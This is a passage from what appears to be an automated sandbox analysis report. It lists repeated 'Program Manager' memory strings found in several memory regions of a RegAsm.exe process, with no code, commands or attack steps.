            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q`vh
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qLNP
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q(gl
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qX<
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qL.2
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qt]V
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q8&:
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.3755465000.000000000323B000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q|
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q|t?
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qp{p
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q\3:
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qP:k
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q8lt
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qpZf
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qtC(
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qhK=
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.3755465000.000000000323B000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_ql
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q$"v
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qp
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qp9\
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q|ri
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q`}1
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q<4,
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qtc@
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q$Cr
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qt
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q@\J
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q\1d
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qhjq
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qT";
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q(n5
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.3755465000.000000000323B000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qx
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q0/
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q|Q_
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qH)l
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q$h*
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q >D
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qXmZ
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q8,U
            Source: RegAsm.exe, 00000006.00000002.3755465000.000000000323B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qHo%
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qT$0
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q@;z
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qtdI
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q@}s
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qH*x
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qTf'
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qDDX
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qx*H
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q0J
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qddS
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q <n
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qp\<
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q,Tq
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.3755465000.000000000323B000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q<
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q@[A
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qhIH
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q8Ix
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.3755465000.000000000323B000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q@
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.3755465000.000000000323B000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qD
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q@:7
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.3755465000.000000000323B000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qH
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q,2?
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.3755465000.000000000323B000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q,
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.3755465000.000000000323B000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q0
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q4 ^
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q@Yk
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q08y
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.3755465000.000000000323B000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q4
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q8JB
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qT@Y
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q`yf
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qt_x
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qDB-
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.3755465000.000000000323B000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q8
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qXj=
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qQs
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qp84
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q@8a
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qLqn
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qdb(
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.3755465000.000000000323B000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q\
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qtB6
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qLtM
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q0\T
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qLT/
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qhIg
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q|/y
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.3755465000.000000000323B000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q`
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_ql2)
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qTAo
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qd
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qv+
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qpZG
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qh(]
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qtaj
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qXl2
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q<tW
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q`8v
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.3755465000.000000000323B000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qh
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qxJ,
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.3755465000.000000000323B000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qL
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q8KK
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qX'
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.3755465000.000000000323B000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qP
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q(KU
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qDC0
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qt@`
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qT
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qDcN
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.3755465000.000000000323B000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qX
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q4cX
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q$"I
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q8`o
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qh?8
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q8?e
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qDxr
            Source: RegAsm.exe, 00000006.00000002.3755465000.000000000323B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qT8$
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qPqA
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q|%G
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q$7m
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q,=
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q00<
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qX_`
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qtW;
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qDWh
            Source: RegAsm.exe, 00000006.00000002.3755465000.000000000323B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q`/$
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qh>L
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qH@*
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q0Op
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q<H?
            Source: RegAsm.exe, 00000006.00000002.3755465000.000000000323B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q$Z$
            Source: RegAsm.exe, 00000006.00000002.3755465000.000000000323B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q( &
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q4z3
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qdwc
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q\$u
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q`.9
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qTX-
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qD6^
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q<J4
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q+y
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q|&P
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q RY
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q@rT
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q0t(
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q\j/
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q\(.
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q,j\
            Source: RegAsm.exe, 00000006.00000002.3755465000.000000000323B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q<J$
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q,IR
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qpNv
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qHaK
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q sD
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q$9C
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qDY>
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q8aU
            Source: RegAsm.exe, 00000006.00000002.3755465000.000000000323B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qHA$
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qtUF
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_ql#\
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q@oV
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.3755465000.000000000323B000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q|E+
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q<FJ
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.3755465000.000000000323B000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q`,D
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qX^8
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qlDG
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q(^e
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qdv;
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q8=Q
